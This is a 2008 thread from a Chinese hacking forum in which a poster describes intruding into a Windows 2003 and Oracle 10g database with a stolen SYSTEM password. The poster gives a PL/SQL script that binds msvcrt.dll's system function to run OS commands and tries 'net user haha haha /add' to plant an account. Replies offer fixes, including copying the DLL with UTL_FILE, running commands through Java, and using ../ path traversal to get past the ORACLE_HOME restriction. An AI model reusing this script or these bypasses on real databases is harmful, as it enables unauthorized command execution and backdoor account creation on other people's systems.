Board logo

标题: [讨论]Oracle入侵中遇到的问题 [打印本页]

作者: MAYA    时间: 2008-7-23 08:32     标题: [讨论]Oracle入侵中遇到的问题

[讨论]Oracle入侵中遇到的问题
议题作者:mon
近日入侵一数据库,系统环境为 win2k3+Oracle 10g(R2).获得了system的密码.用sqlplus连接.创建Oracle Execute Command Sql Script 以执行系统命令.

Oracle Execute Command Sql Script 如下:
CREATE OR REPLACE LIBRARY exec_shell AS 'D:\windows\system32\msvcrt.dll';
/
show errors
CREATE OR REPLACE PACKAGE oracmd IS PROCEDURE exec (cmdstring IN CHAR);
end oracmd;
/
show errors
CREATE OR REPLACE PACKAGE BODY oracmd IS
PROCEDURE exec(cmdstring IN CHAR)
IS EXTERNAL
NAME "system"
LIBRARY exec_shell
LANGUAGE C;
end oracmd;
/
show errors

可是执行命令时却出现这样的错误:
SQL> exec oracmd.exec ('net user haha haha /add');
BEGIN oracmd.exec ('net user haha haha /add'); END;

*
第 1 行出现错误:
ORA-28595: Extproc 代理: DLL 路径无效
ORA-06512: 在 "SYSTEM.ORACMD", line 2
ORA-06512: 在 line 1

不知出什么问题了.请高手解答.
作者: 快乐天使    时间: 2008-7-23 08:32

如果我没有理解错,你应该想说2k3而不是3k2,然后问题好想在c:\winnt\system32上,应该是c:\windows\system32吧
我懂的不多,说错了莫笑哈

帖子38 精华2 积分147 阅读权限40 性别男 在线时间108 小时 注册时间2007-3-18 最后登录2008-5-25 查看详细资料TOP 爱要怎么说出口

mon
晶莹剔透§烈日灼然
作者: sxp    时间: 2008-7-23 08:32

哎呀 ! 过于马虎.写错了一点.系统的确是win2k3 sp2才对.并且系统装在D盘.用Oracle Execute Command Sql Script 没注意到winnt.不过改了还是老样子.是不是10g现在不支持这个Oracle Execute Command Sql Script 了?
帖子4 精华0 积分16 阅读权限40 性别男 在线时间6 小时 注册时间2007-1-18 最后登录2008-3-26 查看详细资料TOP 赚更多的钱

poison
晶莹剔透§烈日灼然
作者: ahwx    时间: 2008-7-23 08:32

貌似是ORACLE把外部库的位置限制在了ORACLE_HOME中  
原则上可以用UTL_FILE复制DLL到限制目录中 可俺没成功过

我都是用JAVA执行OS命令
帖子5 精华0 积分15 阅读权限40 性别男 在线时间9 小时 注册时间2007-4-20 最后登录2008-5-4 查看详细资料TOP

mickey
晶莹剔透§烈日灼然
作者: 东视人    时间: 2008-7-23 08:32

貌似可以用../../../绕过ORACLE_HOME限制
帖子16 精华0 积分51 阅读权限40 在线时间14 小时 注册时间2004-12-20 最后登录2008-4-14 查看详细资料TOP 少女暴富的隐秘(图)

poison
晶莹剔透§烈日灼然




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./) Powered by Discuz! 7.2